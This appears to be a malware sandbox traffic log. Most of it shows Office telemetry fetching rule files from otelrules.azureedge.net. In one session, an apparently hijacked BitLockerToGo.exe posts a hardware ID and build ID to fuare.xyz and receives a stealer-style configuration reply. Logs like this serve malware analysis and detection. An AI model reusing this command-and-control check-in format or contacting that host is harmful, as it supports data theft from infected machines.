                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 56b7ef4f-301e-003f-0261-35266f000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142543Z-1749fc9bdbdlzhmchC1DFWe68s00000002dg00000000gszw
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        132192.168.2.54984113.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:43 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1370
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 43525779-601e-003e-2ed2-2c3248000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142543Z-16547b76f7f4k79zhC1DFWu9y00000000kt000000000e1yn
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        133192.168.2.54984213.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 524ac160-c01e-007a-69d2-2cb877000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142544Z-16547b76f7fkcrm9hC1DFWxdag0000000kx0000000009rmt
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        134192.168.2.54984413.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1406
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 18d5585a-801e-0015-2dfc-35f97f000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142544Z-1749fc9bdbdjjp8thC1DFWye6g00000002h000000000exfr
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        135192.168.2.54984613.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1414
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE03B051D"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 8ba6fbd3-701e-0032-29d2-2ca540000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142544Z-16547b76f7f775p5hC1DFWzdvn0000000ks000000000bct5
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        136192.168.2.54984513.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1369
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 44d511d9-701e-000d-2909-2c6de3000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142544Z-16547b76f7fk9g8vhC1DFW825400000000kg00000000kd43
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        137192.168.2.54984313.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: e359ea9f-f01e-001f-36a3-345dc8000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142544Z-r178fb8d765dbpv9hC1DFWma700000000130000000000g5c
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                        138192.168.2.549847116.203.0.1594436152C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC316OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                                                        Host: fuare.xyz
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 256
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 36 36 38 44 42 30 42 31 33 46 33 32 33 35 31 31 34 31 39 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 37 35 33 36 61 33 38 64 33 37 30 37 62 36 36 30 30 66 32 38 62 39 64 37 31 37 37 61 31 32 63 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="hwid"36668DB0B13F3235114199-a33c7340-61ca------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="build_id"27536a38d3707b6600f28b9d7177a12c------EGCBFIEHIEGCAAAKKKKE--
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:45 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 36 37 62 31 36 31 66 36 66 38 62 35 30 36 38 66 61 35 66 63 34 39 31 64 62 63 38 63 66 32 36 31 7c 31 7c 30 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3a1|1|1|1|67b161f6f8b5068fa5fc491dbc8cf261|1|0|1|0|0|50000|10


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        139192.168.2.54984813.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:45 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1377
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEAFF0125"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: d174a67d-801e-00a0-4878-352196000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
